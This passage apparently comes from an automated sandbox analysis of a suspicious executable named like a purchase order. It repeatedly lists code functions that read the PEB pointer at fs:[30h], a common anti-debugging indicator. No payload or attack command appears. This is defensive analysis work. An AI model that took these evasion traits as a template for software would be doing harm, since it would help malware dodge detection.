              Source: C:\Users\user\Desktop\PO No. 0146850827805 HSP0059842.exeCode function: 0_2_0153C156 mov eax, dword ptr fs:[00000030h]0_2_0153C156
              Source: C:\Users\user\Desktop\PO No. 0146850827805 HSP0059842.exeCode function: 0_2_015D8158 mov eax, dword ptr fs:[00000030h]0_2_015D8158
              Source: C:\Users\user\Desktop\PO No. 0146850827805 HSP0059842.exeCode function: 0_2_01614164 mov eax, dword ptr fs:[00000030h]0_2_01614164
              Source: C:\Users\user\Desktop\PO No. 0146850827805 HSP0059842.exeCode function: 0_2_01614164 mov eax, dword ptr fs:[00000030h]0_2_01614164
              Source: C:\Users\user\Desktop\PO No. 0146850827805 HSP0059842.exeCode function: 0_2_015D4144 mov eax, dword ptr fs:[00000030h]0_2_015D4144
              Source: C:\Users\user\Desktop\PO No. 0146850827805 HSP0059842.exeCode function: 0_2_015D4144 mov eax, dword ptr fs:[00000030h]0_2_015D4144
              Source: C:\Users\user\Desktop\PO No. 0146850827805 HSP0059842.exeCode function: 0_2_015D4144 mov ecx, dword ptr fs:[00000030h]0_2_015D4144
              Source: C:\Users\user\Desktop\PO No. 0146850827805 HSP0059842.exeCode function: 0_2_015D4144 mov eax, dword ptr fs:[00000030h]0_2_015D4144
              Source: C:\Users\user\Desktop\PO No. 0146850827805 HSP0059842.exeCode function: 0_2_015D4144 mov eax, dword ptr fs:[00000030h]0_2_015D4144
              Source: C:\Users\user\Desktop\PO No. 0146850827805 HSP0059842.exeCode function: 0_2_015EA118 mov ecx, dword ptr fs:[00000030h]0_2_015EA118
              Source: C:\Users\user\Desktop\PO No. 0146850827805 HSP0059842.exeCode function: 0_2_015EA118 mov eax, dword ptr fs:[00000030h]0_2_015EA118
              Source: C:\Users\user\Desktop\PO No. 0146850827805 HSP0059842.exeCode function: 0_2_015EA118 mov eax, dword ptr fs:[00000030h]0_2_015EA118
              Source: C:\Users\user\Desktop\PO No. 0146850827805 HSP0059842.exeCode function: 0_2_015EA118 mov eax, dword ptr fs:[00000030h]0_2_015EA118
              Source: C:\Users\user\Desktop\PO No. 0146850827805 HSP0059842.exeCode function: 0_2_015EE10E mov eax, dword ptr fs:[00000030h]0_2_015EE10E
              Source: C:\Users\user\Desktop\PO No. 0146850827805 HSP0059842.exeCode function: 0_2_015EE10E mov ecx, dword ptr fs:[00000030h]0_2_015EE10E
              Source: C:\Users\user\Desktop\PO No. 0146850827805 HSP0059842.exeCode function: 0_2_015EE10E mov eax, dword ptr fs:[00000030h]0_2_015EE10E
              Source: C:\Users\user\Desktop\PO No. 0146850827805 HSP0059842.exeCode function: 0_2_015EE10E mov eax, dword ptr fs:[00000030h]0_2_015EE10E
              Source: C:\Users\user\Desktop\PO No. 0146850827805 HSP0059842.exeCode function: 0_2_015EE10E mov ecx, dword ptr fs:[00000030h]0_2_015EE10E
              Source: C:\Users\user\Desktop\PO No. 0146850827805 HSP0059842.exeCode function: 0_2_015EE10E mov eax, dword ptr fs:[00000030h]0_2_015EE10E
              Source: C:\Users\user\Desktop\PO No. 0146850827805 HSP0059842.exeCode function: 0_2_015EE10E mov eax, dword ptr fs:[00000030h]0_2_015EE10E
              Source: C:\Users\user\Desktop\PO No. 0146850827805 HSP0059842.exeCode function: 0_2_015EE10E mov ecx, dword ptr fs:[00000030h]0_2_015EE10E
              Source: C:\Users\user\Desktop\PO No. 0146850827805 HSP0059842.exeCode function: 0_2_015EE10E mov eax, dword ptr fs:[00000030h]0_2_015EE10E
              Source: C:\Users\user\Desktop\PO No. 0146850827805 HSP0059842.exeCode function: 0_2_015EE10E mov ecx, dword ptr fs:[00000030h]0_2_015EE10E
              Source: C:\Users\user\Desktop\PO No. 0146850827805 HSP0059842.exeCode function: 0_2_01570124 mov eax, dword ptr fs:[00000030h]0_2_01570124
              Source: C:\Users\user\Desktop\PO No. 0146850827805 HSP0059842.exeCode function: 0_2_01600115 mov eax, dword ptr fs:[00000030h]0_2_01600115
              Source: C:\Users\user\Desktop\PO No. 0146850827805 HSP0059842.exeCode function: 0_2_016161E5 mov eax, dword ptr fs:[00000030h]0_2_016161E5
              Source: C:\Users\user\Desktop\PO No. 0146850827805 HSP0059842.exeCode function: 0_2_015BE1D0 mov eax, dword ptr fs:[00000030h]0_2_015BE1D0
              Source: C:\Users\user\Desktop\PO No. 0146850827805 HSP0059842.exeCode function: 0_2_015BE1D0 mov eax, dword ptr fs:[00000030h]0_2_015BE1D0
              Source: C:\Users\user\Desktop\PO No. 0146850827805 HSP0059842.exeCode function: 0_2_015BE1D0 mov ecx, dword ptr fs:[00000030h]0_2_015BE1D0
              Source: C:\Users\user\Desktop\PO No. 0146850827805 HSP0059842.exeCode function: 0_2_015BE1D0 mov eax, dword ptr fs:[00000030h]0_2_015BE1D0
              Source: C:\Users\user\Desktop\PO No. 0146850827805 HSP0059842.exeCode function: 0_2_015BE1D0 mov eax, dword ptr fs:[00000030h]0_2_015BE1D0
              Source: C:\Users\user\Desktop\PO No. 0146850827805 HSP0059842.exeCode function: 0_2_016061C3 mov eax, dword ptr fs:[00000030h]0_2_016061C3
              Source: C:\Users\user\Desktop\PO No. 0146850827805 HSP0059842.exeCode function: 0_2_016061C3 mov eax, dword ptr fs:[00000030h]0_2_016061C3
              Source: C:\Users\user\Desktop\PO No. 0146850827805 HSP0059842.exeCode function: 0_2_015701F8 mov eax, dword ptr fs:[00000030h]0_2_015701F8
              Source: C:\Users\user\Desktop\PO No. 0146850827805 HSP0059842.exeCode function: 0_2_015C019F mov eax, dword ptr fs:[00000030h]0_2_015C019F
              Source: C:\Users\user\Desktop\PO No. 0146850827805 HSP0059842.exeCode function: 0_2_015C019F mov eax, dword ptr fs:[00000030h]0_2_015C019F
              Source: C:\Users\user\Desktop\PO No. 0146850827805 HSP0059842.exeCode function: 0_2_015C019F mov eax, dword ptr fs:[00000030h]0_2_015C019F
              Source: C:\Users\user\Desktop\PO No. 0146850827805 HSP0059842.exeCode function: 0_2_015C019F mov eax, dword ptr fs:[00000030h]0_2_015C019F
              Source: C:\Users\user\Desktop\PO No. 0146850827805 HSP0059842.exeCode function: 0_2_0153A197 mov eax, dword ptr fs:[00000030h]0_2_0153A197
              Source: C:\Users\user\Desktop\PO No. 0146850827805 HSP0059842.exeCode function: 0_2_0153A197 mov eax, dword ptr fs:[00000030h]0_2_0153A197
              Source: C:\Users\user\Desktop\PO No. 0146850827805 HSP0059842.exeCode function: 0_2_0153A197 mov eax, dword ptr fs:[00000030h]0_2_0153A197
              Source: C:\Users\user\Desktop\PO No. 0146850827805 HSP0059842.exeCode function: 0_2_015FC188 mov eax, dword ptr fs:[00000030h]0_2_015FC188
              Source: C:\Users\user\Desktop\PO No. 0146850827805 HSP0059842.exeCode function: 0_2_015FC188 mov eax, dword ptr fs:[00000030h]0_2_015FC188
              Source: C:\Users\user\Desktop\PO No. 0146850827805 HSP0059842.exeCode function: 0_2_01580185 mov eax, dword ptr fs:[00000030h]0_2_01580185
              Source: C:\Users\user\Desktop\PO No. 0146850827805 HSP0059842.exeCode function: 0_2_015E4180 mov eax, dword ptr fs:[00000030h]0_2_015E4180
              Source: C:\Users\user\Desktop\PO No. 0146850827805 HSP0059842.exeCode function: 0_2_015E4180 mov eax, dword ptr fs:[00000030h]0_2_015E4180
              Source: C:\Users\user\Desktop\PO No. 0146850827805 HSP0059842.exeCode function: 0_2_01542050 mov eax, dword ptr fs:[00000030h]0_2_01542050
              Source: C:\Users\user\Desktop\PO No. 0146850827805 HSP0059842.exeCode function: 0_2_015C6050 mov eax, dword ptr fs:[00000030h]0_2_015C6050
              Source: C:\Users\user\Desktop\PO No. 0146850827805 HSP0059842.exeCode function: 0_2_0156C073 mov eax, dword ptr fs:[00000030h]0_2_0156C073
              Source: C:\Users\user\Desktop\PO No. 0146850827805 HSP0059842.exeCode function: 0_2_0155E016 mov eax, dword ptr fs:[00000030h]0_2_0155E016
              Source: C:\Users\user\Desktop\PO No. 0146850827805 HSP0059842.exeCode function: 0_2_0155E016 mov eax, dword ptr fs:[00000030h]0_2_0155E016
              Source: C:\Users\user\Desktop\PO No. 0146850827805 HSP0059842.exeCode function: 0_2_0155E016 mov eax, dword ptr fs:[00000030h]0_2_0155E016
              Source: C:\Users\user\Desktop\PO No. 0146850827805 HSP0059842.exeCode function: 0_2_0155E016 mov eax, dword ptr fs:[00000030h]0_2_0155E016
              Source: C:\Users\user\Desktop\PO No. 0146850827805 HSP0059842.exeCode function: 0_2_015C4000 mov ecx, dword ptr fs:[00000030h]0_2_015C4000
              Source: C:\Users\user\Desktop\PO No. 0146850827805 HSP0059842.exeCode function: 0_2_015E2000 mov eax, dword ptr fs:[00000030h]0_2_015E2000
              Source: C:\Users\user\Desktop\PO No. 0146850827805 HSP0059842.exeCode function: 0_2_015E2000 mov eax, dword ptr fs:[00000030h]0_2_015E2000
              Source: C:\Users\user\Desktop\PO No. 0146850827805 HSP0059842.exeCode function: 0_2_015E2000 mov eax, dword ptr fs:[00000030h]0_2_015E2000
              Source: C:\Users\user\Desktop\PO No. 0146850827805 HSP0059842.exeCode function: 0_2_015E2000 mov eax, dword ptr fs:[00000030h]0_2_015E2000
              Source: C:\Users\user\Desktop\PO No. 0146850827805 HSP0059842.exeCode function: 0_2_015E2000 mov eax, dword ptr fs:[00000030h]0_2_015E2000
              Source: C:\Users\user\Desktop\PO No. 0146850827805 HSP0059842.exeCode function: 0_2_015E2000 mov eax, dword ptr fs:[00000030h]0_2_015E2000
              Source: C:\Users\user\Desktop\PO No. 0146850827805 HSP0059842.exeCode function: 0_2_015E2000 mov eax, dword ptr fs:[00000030h]0_2_015E2000
              Source: C:\Users\user\Desktop\PO No. 0146850827805 HSP0059842.exeCode function: 0_2_015E2000 mov eax, dword ptr fs:[00000030h]0_2_015E2000
              Source: C:\Users\user\Desktop\PO No. 0146850827805 HSP0059842.exeCode function: 0_2_015D6030 mov eax, dword ptr fs:[00000030h]0_2_015D6030
              Source: C:\Users\user\Desktop\PO No. 0146850827805 HSP0059842.exeCode function: 0_2_0153A020 mov eax, dword ptr fs:[00000030h]0_2_0153A020
              Source: C:\Users\user\Desktop\PO No. 0146850827805 HSP0059842.exeCode function: 0_2_0153C020 mov eax, dword ptr fs:[00000030h]0_2_0153C020
              Source: C:\Users\user\Desktop\PO No. 0146850827805 HSP0059842.exeCode function: 0_2_015C20DE mov eax, dword ptr fs:[00000030h]0_2_015C20DE
              Source: C:\Users\user\Desktop\PO No. 0146850827805 HSP0059842.exeCode function: 0_2_0153C0F0 mov eax, dword ptr fs:[00000030h]0_2_0153C0F0
              Source: C:\Users\user\Desktop\PO No. 0146850827805 HSP0059842.exeCode function: 0_2_015820F0 mov ecx, dword ptr fs:[00000030h]0_2_015820F0
              Source: C:\Users\user\Desktop\PO No. 0146850827805 HSP0059842.exeCode function: 0_2_0153A0E3 mov ecx, dword ptr fs:[00000030h]0_2_0153A0E3
              Source: C:\Users\user\Desktop\PO No. 0146850827805 HSP0059842.exeCode function: 0_2_015C60E0 mov eax, dword ptr fs:[00000030h]0_2_015C60E0
              Source: C:\Users\user\Desktop\PO No. 0146850827805 HSP0059842.exeCode function: 0_2_015480E9 mov eax, dword ptr fs:[00000030h]0_2_015480E9
              Source: C:\Users\user\Desktop\PO No. 0146850827805 HSP0059842.exeCode function: 0_2_016060B8 mov eax, dword ptr fs:[00000030h]0_2_016060B8
              Source: C:\Users\user\Desktop\PO No. 0146850827805 HSP0059842.exeCode function: 0_2_016060B8 mov ecx, dword ptr fs:[00000030h]0_2_016060B8
              Source: C:\Users\user\Desktop\PO No. 0146850827805 HSP0059842.exeCode function: 0_2_0154208A mov eax, dword ptr fs:[00000030h]0_2_0154208A
              Source: C:\Users\user\Desktop\PO No. 0146850827805 HSP0059842.exeCode function: 0_2_015D80A8 mov eax, dword ptr fs:[00000030h]0_2_015D80A8
              Source: C:\Users\user\Desktop\PO No. 0146850827805 HSP0059842.exeCode function: 0_2_015C035C mov eax, dword ptr fs:[00000030h]0_2_015C035C
              Source: C:\Users\user\Desktop\PO No. 0146850827805 HSP0059842.exeCode function: 0_2_015C035C mov eax, dword ptr fs:[00000030h]0_2_015C035C
              Source: C:\Users\user\Desktop\PO No. 0146850827805 HSP0059842.exeCode function: 0_2_015C035C mov eax, dword ptr fs:[00000030h]0_2_015C035C
              Source: C:\Users\user\Desktop\PO No. 0146850827805 HSP0059842.exeCode function: 0_2_015C035C mov ecx, dword ptr fs:[00000030h]0_2_015C035C
              Source: C:\Users\user\Desktop\PO No. 0146850827805 HSP0059842.exeCode function: 0_2_015C035C mov eax, dword ptr fs:[00000030h]0_2_015C035C
              Source: C:\Users\user\Desktop\PO No. 0146850827805 HSP0059842.exeCode function: 0_2_015C035C mov eax, dword ptr fs:[00000030h]0_2_015C035C
              Source: C:\Users\user\Desktop\PO No. 0146850827805 HSP0059842.exeCode function: 0_2_015E8350 mov ecx, dword ptr fs:[00000030h]0_2_015E8350
              Source: C:\Users\user\Desktop\PO No. 0146850827805 HSP0059842.exeCode function: 0_2_015C2349 mov eax, dword ptr fs:[00000030h]0_2_015C2349
              Source: C:\Users\user\Desktop\PO No. 0146850827805 HSP0059842.exeCode function: 0_2_015C2349 mov eax, dword ptr fs:[00000030h]0_2_015C2349
              Source: C:\Users\user\Desktop\PO No. 0146850827805 HSP0059842.exeCode function: 0_2_015C2349 mov eax, dword ptr fs:[00000030h]0_2_015C2349
              Source: C:\Users\user\Desktop\PO No. 0146850827805 HSP0059842.exeCode function: 0_2_015C2349 mov eax, dword ptr fs:[00000030h]0_2_015C2349
              Source: C:\Users\user\Desktop\PO No. 0146850827805 HSP0059842.exeCode function: 0_2_015C2349 mov eax, dword ptr fs:[00000030h]0_2_015C2349
              Source: C:\Users\user\Desktop\PO No. 0146850827805 HSP0059842.exeCode function: 0_2_015C2349 mov eax, dword ptr fs:[00000030h]0_2_015C2349
              Source: C:\Users\user\Desktop\PO No. 0146850827805 HSP0059842.exeCode function: 0_2_015C2349 mov eax, dword ptr fs:[00000030h]0_2_015C2349
              Source: C:\Users\user\Desktop\PO No. 0146850827805 HSP0059842.exeCode function: 0_2_015C2349 mov eax, dword ptr fs:[00000030h]0_2_015C2349
              Source: C:\Users\user\Desktop\PO No. 0146850827805 HSP0059842.exeCode function: 0_2_015C2349 mov eax, dword ptr fs:[00000030h]0_2_015C2349
              Source: C:\Users\user\Desktop\PO No. 0146850827805 HSP0059842.exeCode function: 0_2_015C2349 mov eax, dword ptr fs:[00000030h]0_2_015C2349
              Source: C:\Users\user\Desktop\PO No. 0146850827805 HSP0059842.exeCode function: 0_2_015C2349 mov eax, dword ptr fs:[00000030h]0_2_015C2349
              Source: C:\Users\user\Desktop\PO No. 0146850827805 HSP0059842.exeCode function: 0_2_015C2349 mov eax, dword ptr fs:[00000030h]0_2_015C2349
              Source: C:\Users\user\Desktop\PO No. 0146850827805 HSP0059842.exeCode function: 0_2_015C2349 mov eax, dword ptr fs:[00000030h]0_2_015C2349
              Source: C:\Users\user\Desktop\PO No. 0146850827805 HSP0059842.exeCode function: 0_2_015C2349 mov eax, dword ptr fs:[00000030h]0_2_015C2349
              Source: C:\Users\user\Desktop\PO No. 0146850827805 HSP0059842.exeCode function: 0_2_015C2349 mov eax, dword ptr fs:[00000030h]0_2_015C2349
              Source: C:\Users\user\Desktop\PO No. 0146850827805 HSP0059842.exeCode function: 0_2_015E437C mov eax, dword ptr fs:[00000030h]0_2_015E437C
              Source: C:\Users\user\Desktop\PO No. 0146850827805 HSP0059842.exeCode function: 0_2_0160A352 mov eax, dword ptr fs:[00000030h]0_2_0160A352
              Source: C:\Users\user\Desktop\PO No. 0146850827805 HSP0059842.exeCode function: 0_2_0153C310 mov ecx, dword ptr fs:[00000030h]0_2_0153C310
              Source: C:\Users\user\Desktop\PO No. 0146850827805 HSP0059842.exeCode function: 0_2_01560310 mov ecx, dword ptr fs:[00000030h]0_2_01560310
              Source: C:\Users\user\Desktop\PO No. 0146850827805 HSP0059842.exeCode function: 0_2_0157A30B mov eax, dword ptr fs:[00000030h]0_2_0157A30B
              Source: C:\Users\user\Desktop\PO No. 0146850827805 HSP0059842.exeCode function: 0_2_0157A30B mov eax, dword ptr fs:[00000030h]0_2_0157A30B
              Source: C:\Users\user\Desktop\PO No. 0146850827805 HSP0059842.exeCode function: 0_2_0157A30B mov eax, dword ptr fs:[00000030h]0_2_0157A30B
              Source: C:\Users\user\Desktop\PO No. 0146850827805 HSP0059842.exeCode function: 0_2_015EE3DB mov eax, dword ptr fs:[00000030h]0_2_015EE3DB
              Source: C:\Users\user\Desktop\PO No. 0146850827805 HSP0059842.exeCode function: 0_2_015EE3DB mov eax, dword ptr fs:[00000030h]0_2_015EE3DB
              Source: C:\Users\user\Desktop\PO No. 0146850827805 HSP0059842.exeCode function: 0_2_015EE3DB mov ecx, dword ptr fs:[00000030h]0_2_015EE3DB
              Source: C:\Users\user\Desktop\PO No. 0146850827805 HSP0059842.exeCode function: 0_2_015EE3DB mov eax, dword ptr fs:[00000030h]0_2_015EE3DB
              Source: C:\Users\user\Desktop\PO No. 0146850827805 HSP0059842.exeCode function: 0_2_015E43D4 mov eax, dword ptr fs:[00000030h]0_2_015E43D4
              Source: C:\Users\user\Desktop\PO No. 0146850827805 HSP0059842.exeCode function: 0_2_015E43D4 mov eax, dword ptr fs:[00000030h]0_2_015E43D4
              Source: C:\Users\user\Desktop\PO No. 0146850827805 HSP0059842.exeCode function: 0_2_015FC3CD mov eax, dword ptr fs:[00000030h]0_2_015FC3CD
              Source: C:\Users\user\Desktop\PO No. 0146850827805 HSP0059842.exeCode function: 0_2_0154A3C0 mov eax, dword ptr fs:[00000030h]0_2_0154A3C0
              Source: C:\Users\user\Desktop\PO No. 0146850827805 HSP0059842.exeCode function: 0_2_0154A3C0 mov eax, dword ptr fs:[00000030h]0_2_0154A3C0
              Source: C:\Users\user\Desktop\PO No. 0146850827805 HSP0059842.exeCode function: 0_2_0154A3C0 mov eax, dword ptr fs:[00000030h]0_2_0154A3C0
              Source: C:\Users\user\Desktop\PO No. 0146850827805 HSP0059842.exeCode function: 0_2_0154A3C0 mov eax, dword ptr fs:[00000030h]0_2_0154A3C0
              Source: C:\Users\user\Desktop\PO No. 0146850827805 HSP0059842.exeCode function: 0_2_0154A3C0 mov eax, dword ptr fs:[00000030h]0_2_0154A3C0
              Source: C:\Users\user\Desktop\PO No. 0146850827805 HSP0059842.exeCode function: 0_2_0154A3C0 mov eax, dword ptr fs:[00000030h]0_2_0154A3C0
              Source: C:\Users\user\Desktop\PO No. 0146850827805 HSP0059842.exeCode function: 0_2_015483C0 mov eax, dword ptr fs:[00000030h]0_2_015483C0
              Source: C:\Users\user\Desktop\PO No. 0146850827805 HSP0059842.exeCode function: 0_2_015483C0 mov eax, dword ptr fs:[00000030h]0_2_015483C0
              Source: C:\Users\user\Desktop\PO No. 0146850827805 HSP0059842.exeCode function: 0_2_015483C0 mov eax, dword ptr fs:[00000030h]0_2_015483C0
              Source: C:\Users\user\Desktop\PO No. 0146850827805 HSP0059842.exeCode function: 0_2_015483C0 mov eax, dword ptr fs:[00000030h]0_2_015483C0
              Source: C:\Users\user\Desktop\PO No. 0146850827805 HSP0059842.exeCode function: 0_2_015C63C0 mov eax, dword ptr fs:[00000030h]0_2_015C63C0
              Source: C:\Users\user\Desktop\PO No. 0146850827805 HSP0059842.exeCode function: 0_2_0155E3F0 mov eax, dword ptr fs:[00000030h]0_2_0155E3F0
              Source: C:\Users\user\Desktop\PO No. 0146850827805 HSP0059842.exeCode function: 0_2_0155E3F0 mov eax, dword ptr fs:[00000030h]0_2_0155E3F0
              Source: C:\Users\user\Desktop\PO No. 0146850827805 HSP0059842.exeCode function: 0_2_0155E3F0 mov eax, dword ptr fs:[00000030h]0_2_0155E3F0
              Source: C:\Users\user\Desktop\PO No. 0146850827805 HSP0059842.exeCode function: 0_2_015763FF mov eax, dword ptr fs:[00000030h]0_2_015763FF
              Source: C:\Users\user\Desktop\PO No. 0146850827805 HSP0059842.exeCode function: 0_2_015503E9 mov eax, dword ptr fs:[00000030h]0_2_015503E9
              Source: C:\Users\user\Desktop\PO No. 0146850827805 HSP0059842.exeCode function: 0_2_015503E9 mov eax, dword ptr fs:[00000030h]0_2_015503E9
              Source: C:\Users\user\Desktop\PO No. 0146850827805 HSP0059842.exeCode function: 0_2_015503E9 mov eax, dword ptr fs:[00000030h]0_2_015503E9
              Source: C:\Users\user\Desktop\PO No. 0146850827805 HSP0059842.exeCode function: 0_2_015503E9 mov eax, dword ptr fs:[00000030h]0_2_015503E9
              Source: C:\Users\user\Desktop\PO No. 0146850827805 HSP0059842.exeCode function: 0_2_015503E9 mov eax, dword ptr fs:[00000030h]0_2_015503E9
              Source: C:\Users\user\Desktop\PO No. 0146850827805 HSP0059842.exeCode function: 0_2_015503E9 mov eax, dword ptr fs:[00000030h]0_2_015503E9
              Source: C:\Users\user\Desktop\PO No. 0146850827805 HSP0059842.exeCode function: 0_2_015503E9 mov eax, dword ptr fs:[00000030h]0_2_015503E9
              Source: C:\Users\user\Desktop\PO No. 0146850827805 HSP0059842.exeCode function: 0_2_015503E9 mov eax, dword ptr fs:[00000030h]0_2_015503E9
              Source: C:\Users\user\Desktop\PO No. 0146850827805 HSP0059842.exeCode function: 0_2_01538397 mov eax, dword ptr fs:[00000030h]0_2_01538397
              Source: C:\Users\user\Desktop\PO No. 0146850827805 HSP0059842.exeCode function: 0_2_01538397 mov eax, dword ptr fs:[00000030h]0_2_01538397
              Source: C:\Users\user\Desktop\PO No. 0146850827805 HSP0059842.exeCode function: 0_2_01538397 mov eax, dword ptr fs:[00000030h]0_2_01538397
              Source: C:\Users\user\Desktop\PO No. 0146850827805 HSP0059842.exeCode function: 0_2_0156438F mov eax, dword ptr fs:[00000030h]0_2_0156438F
              Source: C:\Users\user\Desktop\PO No. 0146850827805 HSP0059842.exeCode function: 0_2_0156438F mov eax, dword ptr fs:[00000030h]0_2_0156438F
              Source: C:\Users\user\Desktop\PO No. 0146850827805 HSP0059842.exeCode function: 0_2_0153E388 mov eax, dword ptr fs:[00000030h]0_2_0153E388
              Source: C:\Users\user\Desktop\PO No. 0146850827805 HSP0059842.exeCode function: 0_2_0153E388 mov eax, dword ptr fs:[00000030h]0_2_0153E388
              Source: C:\Users\user\Desktop\PO No. 0146850827805 HSP0059842.exeCode function: 0_2_0153E388 mov eax, dword ptr fs:[00000030h]0_2_0153E388
              Source: C:\Users\user\Desktop\PO No. 0146850827805 HSP0059842.exeCode function: 0_2_0153A250 mov eax, dword ptr fs:[00000030h]0_2_0153A250
              Source: C:\Users\user\Desktop\PO No. 0146850827805 HSP0059842.exeCode function: 0_2_01546259 mov eax, dword ptr fs:[00000030h]0_2_01546259
              Source: C:\Users\user\Desktop\PO No. 0146850827805 HSP0059842.exeCode function: 0_2_015FA250 mov eax, dword ptr fs:[00000030h]0_2_015FA250
              Source: C:\Users\user\Desktop\PO No. 0146850827805 HSP0059842.exeCode function: 0_2_015FA250 mov eax, dword ptr fs:[00000030h]0_2_015FA250
              Source: C:\Users\user\Desktop\PO No. 0146850827805 HSP0059842.exeCode function: 0_2_015C8243 mov eax, dword ptr fs:[00000030h]0_2_015C8243
              Source: C:\Users\user\Desktop\PO No. 0146850827805 HSP0059842.exeCode function: 0_2_015C8243 mov ecx, dword ptr fs:[00000030h]0_2_015C8243
              Source: C:\Users\user\Desktop\PO No. 0146850827805 HSP0059842.exeCode function: 0_2_015F0274 mov eax, dword ptr fs:[00000030h]0_2_015F0274
              Source: C:\Users\user\Desktop\PO No. 0146850827805 HSP0059842.exeCode function: 0_2_015F0274 mov eax, dword ptr fs:[00000030h]0_2_015F0274
              Source: C:\Users\user\Desktop\PO No. 0146850827805 HSP0059842.exeCode function: 0_2_015F0274 mov eax, dword ptr fs:[00000030h]0_2_015F0274
              Source: C:\Users\user\Desktop\PO No. 0146850827805 HSP0059842.exeCode function: 0_2_015F0274 mov eax, dword ptr fs:[00000030h]0_2_015F0274
              Source: C:\Users\user\Desktop\PO No. 0146850827805 HSP0059842.exeCode function: 0_2_015F0274 mov eax, dword ptr fs:[00000030h]0_2_015F0274
              Source: C:\Users\user\Desktop\PO No. 0146850827805 HSP0059842.exeCode function: 0_2_015F0274 mov eax, dword ptr fs:[00000030h]0_2_015F0274
              Source: C:\Users\user\Desktop\PO No. 0146850827805 HSP0059842.exeCode function: 0_2_015F0274 mov eax, dword ptr fs:[00000030h]0_2_015F0274
              Source: C:\Users\user\Desktop\PO No. 0146850827805 HSP0059842.exeCode function: 0_2_015F0274 mov eax, dword ptr fs:[00000030h]0_2_015F0274
              Source: C:\Users\user\Desktop\PO No. 0146850827805 HSP0059842.exeCode function: 0_2_015F0274 mov eax, dword ptr fs:[00000030h]0_2_015F0274
              Source: C:\Users\user\Desktop\PO No. 0146850827805 HSP0059842.exeCode function: 0_2_015F0274 mov eax, dword ptr fs:[00000030h]0_2_015F0274
              Source: C:\Users\user\Desktop\PO No. 0146850827805 HSP0059842.exeCode function: 0_2_015F0274 mov eax, dword ptr fs:[00000030h]0_2_015F0274
              Source: C:\Users\user\Desktop\PO No. 0146850827805 HSP0059842.exeCode function: 0_2_015F0274 mov eax, dword ptr fs:[00000030h]0_2_015F0274
              Source: C:\Users\user\Desktop\PO No. 0146850827805 HSP0059842.exeCode function: 0_2_01544260 mov eax, dword ptr fs:[00000030h]0_2_01544260
              Source: C:\Users\user\Desktop\PO No. 0146850827805 HSP0059842.exeCode function: 0_2_01544260 mov eax, dword ptr fs:[00000030h]0_2_01544260
              Source: C:\Users\user\Desktop\PO No. 0146850827805 HSP0059842.exeCode function: 0_2_01544260 mov eax, dword ptr fs:[00000030h]0_2_01544260
              Source: C:\Users\user\Desktop\PO No. 0146850827805 HSP0059842.exeCode function: 0_2_0153826B mov eax, dword ptr fs:[00000030h]0_2_0153826B
              Source: C:\Users\user\Desktop\PO No. 0146850827805 HSP0059842.exeCode function: 0_2_0153823B mov eax, dword ptr fs:[00000030h]0_2_0153823B
              Source: C:\Users\user\Desktop\PO No. 0146850827805 HSP0059842.exeCode function: 0_2_0154A2C3 mov eax, dword ptr fs:[00000030h]0_2_0154A2C3
              Source: C:\Users\user\Desktop\PO No. 0146850827805 HSP0059842.exeCode function: 0_2_0154A2C3 mov eax, dword ptr fs:[00000030h]0_2_0154A2C3
              Source: C:\Users\user\Desktop\PO No. 0146850827805 HSP0059842.exeCode function: 0_2_0154A2C3 mov eax, dword ptr fs:[00000030h]0_2_0154A2C3
              Source: C:\Users\user\Desktop\PO No. 0146850827805 HSP0059842.exeCode function: 0_2_0154A2C3 mov eax, dword ptr fs:[00000030h]0_2_0154A2C3
              Source: C:\Users\user\Desktop\PO No. 0146850827805 HSP0059842.exeCode function: 0_2_0154A2C3 mov eax, dword ptr fs:[00000030h]0_2_0154A2C3
              Source: C:\Users\user\Desktop\PO No. 0146850827805 HSP0059842.exeCode function: 0_2_015502E1 mov eax, dword ptr fs:[00000030h]0_2_015502E1
              Source: C:\Users\user\Desktop\PO No. 0146850827805 HSP0059842.exeCode function: 0_2_015502E1 mov eax, dword ptr fs:[00000030h]0_2_015502E1
              Source: C:\Users\user\Desktop\PO No. 0146850827805 HSP0059842.exeCode function: 0_2_015502E1 mov eax, dword ptr fs:[00000030h]0_2_015502E1
              Source: C:\Users\user\Desktop\PO No. 0146850827805 HSP0059842.exeCode function: 0_2_0157E284 mov eax, dword ptr fs:[00000030h]0_2_0157E284
              Source: C:\Users\user\Desktop\PO No. 0146850827805 HSP0059842.exeCode function: 0_2_0157E284 mov eax, dword ptr fs:[00000030h]0_2_0157E284
              Source: C:\Users\user\Desktop\PO No. 0146850827805 HSP0059842.exeCode function: 0_2_015C0283 mov eax, dword ptr fs:[00000030h]0_2_015C0283
              Source: C:\Users\user\Desktop\PO No. 0146850827805 HSP0059842.exeCode function: 0_2_015C0283 mov eax, dword ptr fs:[00000030h]0_2_015C0283
              Source: C:\Users\user\Desktop\PO No. 0146850827805 HSP0059842.exeCode function: 0_2_015C0283 mov eax, dword ptr fs:[00000030h]0_2_015C0283
              Source: C:\Users\user\Desktop\PO No. 0146850827805 HSP0059842.exeCode function: 0_2_015D62A0 mov eax, dword ptr fs:[00000030h]0_2_015D62A0
              Source: C:\Users\user\Desktop\PO No. 0146850827805 HSP0059842.exeCode function: 0_2_015D62A0 mov ecx, dword ptr fs:[00000030h]0_2_015D62A0
              Source: C:\Users\user\Desktop\PO No. 0146850827805 HSP0059842.exeCode function: 0_2_015D62A0 mov eax, dword ptr fs:[00000030h]0_2_015D62A0
              Source: C:\Users\user\Desktop\PO No. 0146850827805 HSP0059842.exeCode function: 0_2_015D62A0 mov eax, dword ptr fs:[00000030h]0_2_015D62A0
              Source: C:\Users\user\Desktop\PO No. 0146850827805 HSP0059842.exeCode function: 0_2_015D62A0 mov eax, dword ptr fs:[00000030h]0_2_015D62A0
              Source: C:\Users\user\Desktop\PO No. 0146850827805 HSP0059842.exeCode function: 0_2_015D62A0 mov eax, dword ptr fs:[00000030h]0_2_015D62A0
              Source: C:\Users\user\Desktop\PO No. 0146850827805 HSP0059842.exeCode function: 0_2_01548550 mov eax, dword ptr fs:[00000030h]0_2_01548550
              Source: C:\Users\user\Desktop\PO No. 0146850827805 HSP0059842.exeCode function: 0_2_01548550 mov eax, dword ptr fs:[00000030h]0_2_01548550
              Source: C:\Users\user\Desktop\PO No. 0146850827805 HSP0059842.exeCode function: 0_2_0157656A mov eax, dword ptr fs:[00000030h]0_2_0157656A
              Source: C:\Users\user\Desktop\PO No. 0146850827805 HSP0059842.exeCode function: 0_2_0157656A mov eax, dword ptr fs:[00000030h]0_2_0157656A
